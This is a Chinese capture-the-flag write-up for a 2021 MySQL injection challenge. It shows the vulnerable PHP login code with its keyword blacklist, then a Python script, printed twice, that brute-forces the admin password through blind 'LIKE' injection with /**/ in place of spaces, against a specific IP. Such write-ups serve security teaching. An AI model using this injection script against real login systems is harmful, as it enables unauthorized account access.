[第五空间 2021]yet_another_mysql_injection

考点：

• like 替换 =
• /**/ 替换 空格
• mysql中 x% 代表 匹配以x开头的所有字符串 和Linux下的*作用一样

下面分析题目

打开题目 查看源码 发现可用信息

访问，直接给出源码

include_once("lib.php");
function alertMes($mes,$url){
    die("");
}

function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}

if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
    $username=$_POST['username'];
    $password=$_POST['password'];
    if ($username !== 'admin') {
        alertMes('only admin can login', 'index.php');
    }
    checkSql($password);
    $sql="SELECT password FROM users WHERE username='admin' and password='$password';";
    $user_result=mysqli_query($con,$sql);
    $row = mysqli_fetch_array($user_result);
    if (!$row) {
        alertMes("something wrong",'index.php');
    }
    if ($row['password'] === $password) {
        die($FLAG);
    } else {
        alertMes("wrong password",'index.php');
    }
}

if(isset($_GET['source'])){
    show_source(__FILE__);
    die;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

我们来审计代码

// 首先 username 必须是admin
if ($username !== 'admin') {
    alertMes('only admin can login', 'index.php');
}

// 其次输入的密码不得在黑名单
function checkSql($s) {
    if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
        alertMes('hacker', 'index.php');
    }
}
checkSql($password);

// sql查询语句
SELECT password FROM users WHERE username='admin' and password='$password';

// 最后当我们输入的 password 等于 $password 输出flag
if ($row['password'] === $password) {
    die($FLAG);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

看到最后 我们知道只有输入的password和数据库中存储的一样的时候才会输出flag，而且前置知识足够，like /**/ ’ % 都没有被过滤，我们可以尝试爆破密码：

import requests,time
alp = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~"
def get_pass():
    url = "http://1.14.71.254:28610/index.php"
    flag = ""
    while True:
        for i in alp:
            data={"username":"admin","password":f"1'or/**/password/**/like/**/'{flag+i}%'#"}
            resp = requests.post(url=url,data=data)
            time.sleep(0.1)
            if "something wrong" not in resp.text:
                flag+=i
                print(flag)
                break
            elif "~" in i:
                return
get_pass()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

跑出来密码为eb2d018ac00e7d6dbe8eb7059df0a4b2，试试登录，返回flag

payload

import requests,time
alp = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~"
def get_pass():
    url = "http://1.14.71.254:28610/index.php"
    flag = ""
    while True:
        for i in alp:
            data={"username":"admin","password":f"1'or/**/password/**/like/**/'{flag+i}%'#"}
            resp = requests.post(url=url,data=data)
            time.sleep(0.1)
            if "something wrong" not in resp.text:
                flag+=i
                print(flag)
                break
            elif "~" in i:
                return
get_pass()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17